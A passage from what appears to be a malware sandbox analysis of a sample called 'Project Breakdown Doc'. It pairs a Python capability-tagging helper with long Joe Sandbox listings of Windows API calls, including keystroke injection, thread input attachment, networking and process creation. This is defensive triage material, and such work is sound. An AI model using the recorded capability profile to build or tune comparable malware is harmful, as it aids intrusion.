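    if "SendInput" in names or {"SetKeyboardState", "PostMessageW"} <= names:
        tags.add("synthetic-keystrokes")
    if "CreateHardLinkW" in names:
        tags.add("ntfs-hardlink")
    return tags

# Constructed input: three records copied from this report's function listing.
SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00CB6CE4
• WSAGetLastError.WSOCK32(00000000), ref: 00CB6CF4
  • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CB6D58
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00CCF910), ref: 00CB67BA
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CA1037
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00CA10B9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00CA110B
"""
```

Running parse_records(SAMPLE) and capability_tags on each record yields udp-broadcast-socket for the first function, nothing for the recv wrapper, and synthetic-keystrokes for the keyboard routine. One caveat when reading such tags from this kind of listing: where the binary is a compiled interpreter (as the report's signatures suggest for this sample), these are the interpreter's own library routines, present whether or not the embedded script ever calls them, so a tag is a lead to confirm against the dynamic behaviour the report records, not evidence by itself.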
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C7644B
                                                  • __isleadbyte_l.LIBCMT ref: 00C76479
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C764A7
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C764DD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: 514e64dc5cf978216c4101ba4ec9cb8017a3544c4d9d90f1f61b2bb087d402b7
                                                  • Instruction ID: 65e721acb41ffbd00e78e134ef61d51fd3ea6b46436a9e9eca86947d1b707ea8
                                                  • Opcode Fuzzy Hash: 514e64dc5cf978216c4101ba4ec9cb8017a3544c4d9d90f1f61b2bb087d402b7
                                                  • Instruction Fuzzy Hash: 9A31E131600646AFDB21CF75CC44BAA7BA9FF40310F158429F86887190D731DA51DB90
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00CC5189
                                                    • Part of subcall function 00CA387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CA3897
                                                    • Part of subcall function 00CA387D: GetCurrentThreadId.KERNEL32 ref: 00CA389E
                                                    • Part of subcall function 00CA387D: AttachThreadInput.USER32(00000000,?,00CA52A7), ref: 00CA38A5
                                                  • GetCaretPos.USER32(?), ref: 00CC519A
                                                  • ClientToScreen.USER32(00000000,?), ref: 00CC51D5
                                                  • GetForegroundWindow.USER32 ref: 00CC51DB
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: 6103d2468c67f5c9c99c7c89ad9ec1b384502acc4276886ba54932af7103f952
                                                  • Instruction ID: c415489957fd2a219dc7129d27c6657d9447992d5cae39569ee77689ca2c7593
                                                  • Opcode Fuzzy Hash: 6103d2468c67f5c9c99c7c89ad9ec1b384502acc4276886ba54932af7103f952
                                                  • Instruction Fuzzy Hash: 44311C71900218AFDB00EFA5C885EEFB7F9EF98304F10406AE415E7251EA75AE45DBA1
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • GetCursorPos.USER32(?), ref: 00CCC7C2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C7BBFB,?,?,?,?,?), ref: 00CCC7D7
                                                  • GetCursorPos.USER32(?), ref: 00CCC824
                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C7BBFB,?,?,?), ref: 00CCC85E
                                                  Similarity
                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                  • String ID:
                                                  • API String ID: 2864067406-0
                                                  • Opcode ID: 49ad2aa8eac1ce043388aa9d6707bdd89daa449edef40fa8029a0bfc0a5a19e3
                                                  • Instruction ID: e5777c79fc8edb2242d41b01b9ab9ca307fc59d67d4dd45890ec24e927353d13
                                                  • Opcode Fuzzy Hash: 49ad2aa8eac1ce043388aa9d6707bdd89daa449edef40fa8029a0bfc0a5a19e3
                                                  • Instruction Fuzzy Hash: D5317E35600118AFCB15CF59C8D8FEB7BBAEB49310F04406DF9198B6A1C7359E61DBA0
                                                  APIs
                                                  • __setmode.LIBCMT ref: 00C60BF2
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CA7B20,?,?,00000000), ref: 00C45B8C
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CA7B20,?,?,00000000,?,?), ref: 00C45BB0
                                                  • _fprintf.LIBCMT ref: 00C60C29
                                                  • OutputDebugStringW.KERNEL32(?), ref: 00C96331
                                                    • Part of subcall function 00C64CDA: _flsall.LIBCMT ref: 00C64CF3
                                                  • __setmode.LIBCMT ref: 00C60C5E
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                  • String ID:
                                                  • API String ID: 521402451-0
                                                  • Opcode ID: 87f854f1bd7279797345e000586a853ee74b17282cb6dee1a397e169e5055c46
                                                  • Instruction ID: 62fc31054d6695f639c447720d440d76a130d6c0a75b043cea79b51550c28e7d
                                                  • Opcode Fuzzy Hash: 87f854f1bd7279797345e000586a853ee74b17282cb6dee1a397e169e5055c46
                                                  • Instruction Fuzzy Hash: 7511E432904604BBCB29B7B49CC69BF7B69EF45320F24011AF204A72D2EE215D56B7A5
                                                  APIs
                                                    • Part of subcall function 00C98652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C98669
                                                    • Part of subcall function 00C98652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C98673
                                                    • Part of subcall function 00C98652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C98682
                                                    • Part of subcall function 00C98652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C98689
                                                    • Part of subcall function 00C98652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C9869F
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C98BEB
                                                  • _memcmp.LIBCMT ref: 00C98C0E
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C98C44
                                                  • HeapFree.KERNEL32(00000000), ref: 00C98C4B
                                                  Similarity
                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 1592001646-0
                                                  • Opcode ID: 380ed6a6da68c6295d6bc77ba76407f383edad742411dd7918e44922e839355d
                                                  • Instruction ID: 4de59c1945ebd98c24a7c21d0de1f7dcc2e3d60bc55cb26a500e8174d6a05f95
                                                  • Opcode Fuzzy Hash: 380ed6a6da68c6295d6bc77ba76407f383edad742411dd7918e44922e839355d
                                                  • Instruction Fuzzy Hash: 91219C71E01208EFCF10DFA4C948BEEB7B8FF41341F08405AE564A7240DB30AA0ACB60
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CB1A97
                                                    • Part of subcall function 00CB1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CB1B40
                                                    • Part of subcall function 00CB1B21: InternetCloseHandle.WININET(00000000), ref: 00CB1BDD
                                                  Similarity
                                                  • API ID: Internet$CloseConnectHandleOpen
                                                  • String ID:
                                                  • API String ID: 1463438336-0
                                                  • Opcode ID: f59901aa4edfdc78dd1199c0a2e741f00934e1ae3a081d32aa1e00490734321d
                                                  • Instruction ID: 29488e162326139ea4c954961170b9c2ed7c30c47886c0642df4315eb673b52a
                                                  • Opcode Fuzzy Hash: f59901aa4edfdc78dd1199c0a2e741f00934e1ae3a081d32aa1e00490734321d
                                                  • Instruction Fuzzy Hash: 3F21CF71200604BFDB119F60CC14FFAB7AEFF48710F58001AFA5196660EB31A921ABA4
                                                  APIs
                                                    • Part of subcall function 00C9F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C9E1C4,?,?,?,00C9EFB7,00000000,000000EF,00000119,?,?), ref: 00C9F5BC
                                                    • Part of subcall function 00C9F5AD: lstrcpyW.KERNEL32(00000000,?,?,00C9E1C4,?,?,?,00C9EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C9F5E2
                                                    • Part of subcall function 00C9F5AD: lstrcmpiW.KERNEL32(00000000,?,00C9E1C4,?,?,?,00C9EFB7,00000000,000000EF,00000119,?,?), ref: 00C9F613
                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C9EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C9E1DD
                                                  • lstrcpyW.KERNEL32(00000000,?,?,00C9EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C9E203
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C9EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C9E237
                                                  Strings
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: 5486dc2c8e4137c4e33a737dcd9c0f9011fc85b7caef41d8eeb21758f8d8c7f3
                                                  • Instruction ID: 4e2062fe741df144bf2dc013e2921a2316c20abe4f0dcb47b6b126ce0deae4e8
                                                  • Opcode Fuzzy Hash: 5486dc2c8e4137c4e33a737dcd9c0f9011fc85b7caef41d8eeb21758f8d8c7f3
                                                  • Instruction Fuzzy Hash: 6A11BE36200345EFCF25AF64D849E7A77A9FF84310B44402AF816CB260EB71D951D7A0
                                                  APIs
                                                  • _free.LIBCMT ref: 00C75351
                                                    • Part of subcall function 00C6594C: __FF_MSGBANNER.LIBCMT ref: 00C65963
                                                    • Part of subcall function 00C6594C: __NMSG_WRITE.LIBCMT ref: 00C6596A
                                                    • Part of subcall function 00C6594C: RtlAllocateHeap.NTDLL(01790000,00000000,00000001,00000000,?,?,?,00C61013,?), ref: 00C6598F
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: 03afb873e93ccafce20fe6ed85cea60447c5b1c9214b37eaf4e76417113312d0
                                                  • Instruction ID: 7618cf31878bb90919358933bb502c205bab10925b8c494dcb53b6f6350484b4
                                                  • Opcode Fuzzy Hash: 03afb873e93ccafce20fe6ed85cea60447c5b1c9214b37eaf4e76417113312d0
                                                  • Instruction Fuzzy Hash: 4711A732504A16AFCB312F70EC85B6D3B94AF113A0F14852EF95D961B1DEF58A41A760
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C44560
                                                    • Part of subcall function 00C4410D: _memset.LIBCMT ref: 00C4418D
                                                    • Part of subcall function 00C4410D: _wcscpy.LIBCMT ref: 00C441E1
                                                    • Part of subcall function 00C4410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C441F1
                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00C445B5
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C445C4
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C7D6CE
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                  • String ID:
                                                  • API String ID: 1378193009-0
                                                  • Opcode ID: 60e7728999a33c15e39006a9accd566450cb9439fb79e1f6333ed65ca22ee66c
                                                  • Instruction ID: fdc36bd85b0a3aa7739f950f8e5dd59d66ced98a4c67d45519a681756493db66
                                                  • Opcode Fuzzy Hash: 60e7728999a33c15e39006a9accd566450cb9439fb79e1f6333ed65ca22ee66c
                                                  • Instruction Fuzzy Hash: FB21D470904784AFEB328B24D855BEBBBFCAF01308F14449EE6AE96281C7745A859B51
                                                  APIs
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CA7B20,?,?,00000000), ref: 00C45B8C
                                                    • Part of subcall function 00C45B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CA7B20,?,?,00000000,?,?), ref: 00C45BB0
                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00CB66AC
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB66B7
                                                  • _memmove.LIBCMT ref: 00CB66E4
                                                  • inet_ntoa.WSOCK32(?), ref: 00CB66EF
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                  • String ID:
                                                  • API String ID: 1504782959-0
                                                  • Opcode ID: 16f2a81d8726a6b6f882f0eecae2d10a3d93249ded6921dfe62086bf3895e6d5
                                                  • Instruction ID: 10c758c3f9762e17e387163619624495809fe3bb13f35cd4868e7a9940e4edb3
                                                  • Opcode Fuzzy Hash: 16f2a81d8726a6b6f882f0eecae2d10a3d93249ded6921dfe62086bf3895e6d5
                                                  • Instruction Fuzzy Hash: 67112E75500509AFCF04EBA4DD86EEEB7B9FF54310B148069F506A72A2DF30AE05EB61
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C99043
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C99055
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C9906B
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C99086
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 3de57bebe972d5c5c2fa4a3a401e732c26d35130295eee1988521b72219f28e3
                                                  • Instruction ID: e6293f4403d2a8498d98725ebf107f4299813302ccc4f8bb1b1760a2dea1ff24
                                                  • Opcode Fuzzy Hash: 3de57bebe972d5c5c2fa4a3a401e732c26d35130295eee1988521b72219f28e3
                                                  • Instruction Fuzzy Hash: F6113A79901218BFDF10DFA9C984E9DBB74FB48710F204095E914B7250D6726E10DB90
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00C412D8
                                                  • GetClientRect.USER32(?,?), ref: 00C7B84B
                                                  • GetCursorPos.USER32(?), ref: 00C7B855
                                                  • ScreenToClient.USER32(?,?), ref: 00C7B860
                                                  Similarity
                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                  • String ID:
                                                  • API String ID: 4127811313-0
                                                  • Opcode ID: 5b41047f1822e7c9ffb77b43692737dd071020fc5b9b00548268d0fdd58ec432
                                                  • Instruction ID: 7e2c63f5f0570557a8a349ad36d848d5c1359ecd2d1aedf29b27b6e493df84ce
                                                  • Opcode Fuzzy Hash: 5b41047f1822e7c9ffb77b43692737dd071020fc5b9b00548268d0fdd58ec432
                                                  • Instruction Fuzzy Hash: 2A114C35A00119AFCB10DF94D885EFE77B9FB05300F004456F951E7250D770BA929BA5
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CA01FD,?,00CA1250,?,00008000), ref: 00CA166F
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CA01FD,?,00CA1250,?,00008000), ref: 00CA1694
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CA01FD,?,00CA1250,?,00008000), ref: 00CA169E
                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00CA01FD,?,00CA1250,?,00008000), ref: 00CA16D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: 9d84bae7242b53187243860d052c1aa73704c29c6f942efb735e453e0e2425b1
                                                  • Instruction ID: c098e5be04f7b3955a7aafbbc325d0f99452c279b52a85eeed3e37e834ca6d6c
                                                  • Opcode Fuzzy Hash: 9d84bae7242b53187243860d052c1aa73704c29c6f942efb735e453e0e2425b1
                                                  • Instruction Fuzzy Hash: 16112A31C1091EDBCF009FA6D949BEEBB78FF0A755F09405AED40F6240CB3096A18B96
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction ID: 3afa560c87b063493d09be128cd5cac795dbc9986db2f81f621c28eb3de37a5f
                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction Fuzzy Hash: 72014B3604814EFBCF165F95CC018EE3F62BF69351B588625FA2C58032D636CAB1AB81
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00CCB59E
                                                  • ScreenToClient.USER32(?,?), ref: 00CCB5B6
                                                  • ScreenToClient.USER32(?,?), ref: 00CCB5DA
                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CCB5F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                  • String ID:
                                                  • API String ID: 357397906-0
                                                  • Opcode ID: 972cd97a841d3770366fad58659323a088b2cc36993287a7b388f856f7bb2a29
                                                  • Instruction ID: d7baf2c27ff12b6cbf0ad0b228373e3a65f793852863e23578ef97616731b434
                                                  • Opcode Fuzzy Hash: 972cd97a841d3770366fad58659323a088b2cc36993287a7b388f856f7bb2a29
                                                  • Instruction Fuzzy Hash: 891146B5D00209EFDB41CF99C444AEEFBB5FB08310F104166E954E3220D735AA558F50
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CCB8FE
                                                  • _memset.LIBCMT ref: 00CCB90D
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D07F20,00D07F64), ref: 00CCB93C
                                                  • CloseHandle.KERNEL32 ref: 00CCB94E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3277943733-0
                                                  • Opcode ID: d8b06f64fcef28f03bcdb5f4cf9c184ce22ec5f8a7c053a9479df282625e53a3
                                                  • Instruction ID: 256c6076b49d287f9bed1f13e3bec26c12407a7d872bf8920e24a50b1be279eb
                                                  • Opcode Fuzzy Hash: d8b06f64fcef28f03bcdb5f4cf9c184ce22ec5f8a7c053a9479df282625e53a3
                                                  • Instruction Fuzzy Hash: 81F05EB2A483417BE2102761AC46FBB3E5CEF08354F004025FB0CDA2A2DB716D0197B8
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00CA6E88
                                                    • Part of subcall function 00CA794E: _memset.LIBCMT ref: 00CA7983
                                                  • _memmove.LIBCMT ref: 00CA6EAB
                                                  • _memset.LIBCMT ref: 00CA6EB8
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00CA6EC8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                  • String ID:
                                                  • API String ID: 48991266-0
                                                  • Opcode ID: 70bb90403ecf7b1872f4850668303b0e2605ad5654f7771956404d0a77777bd1
                                                  • Instruction ID: d89852b61d1b0e22a34d465f4293d45749268179331eeb52338f150822b1d16b
                                                  • Opcode Fuzzy Hash: 70bb90403ecf7b1872f4850668303b0e2605ad5654f7771956404d0a77777bd1
                                                  • Instruction Fuzzy Hash: 47F0543A104200ABCF116F55DC85F4ABB2AEF45320B088065FE085E227C731E911DBB4
                                                  APIs
                                                    • Part of subcall function 00C412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C4134D
                                                    • Part of subcall function 00C412F3: SelectObject.GDI32(?,00000000), ref: 00C4135C
                                                    • Part of subcall function 00C412F3: BeginPath.GDI32(?), ref: 00C41373
                                                    • Part of subcall function 00C412F3: SelectObject.GDI32(?,00000000), ref: 00C4139C
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CCC030
                                                  • LineTo.GDI32(00000000,?,?), ref: 00CCC03D
                                                  • EndPath.GDI32(00000000), ref: 00CCC04D
                                                  • StrokePath.GDI32(00000000), ref: 00CCC05B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                  • String ID:
                                                  • API String ID: 1539411459-0
                                                  • Opcode ID: 94448594c9990ecc284d9dc33075c7259a41ef09642513baaabeab80128951fa
                                                  • Instruction ID: bb488026422d83341857f41bdcb85c8501a4b7f71fc1079c8b60922029a08fdb
                                                  • Opcode Fuzzy Hash: 94448594c9990ecc284d9dc33075c7259a41ef09642513baaabeab80128951fa
                                                  • Instruction Fuzzy Hash: 22F05E31001259BBDB226F54EC0AFCE3F5ABF05711F048008FA15611E287B55662DBA5
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C9A399
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9A3AC
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C9A3B3
                                                  • AttachThreadInput.USER32(00000000), ref: 00C9A3BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 2710830443-0
                                                  • Opcode ID: 8b0d3cd14df0cdbf2399db08f862353c7080625b9206366afb450cda1058551f
                                                  • Instruction ID: 38f2da07672b48766f387d1b10400a37ee2608553bbd697347156cdb5eaa22a1
                                                  • Opcode Fuzzy Hash: 8b0d3cd14df0cdbf2399db08f862353c7080625b9206366afb450cda1058551f
                                                  • Instruction Fuzzy Hash: 52E0C971545228BADB205BA2DC0DFDF7F5DFF167A1F448029F90995060C671C541DBE1
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00C42231
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00C4223B
                                                  • SetBkMode.GDI32(?,00000001), ref: 00C42250
                                                  • GetStockObject.GDI32(00000005), ref: 00C42258
                                                  • GetWindowDC.USER32(?,00000000), ref: 00C7C0D3
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C7C0E0
                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00C7C0F9
                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00C7C112
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00C7C132
                                                  • ReleaseDC.USER32(?,00000000), ref: 00C7C13D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
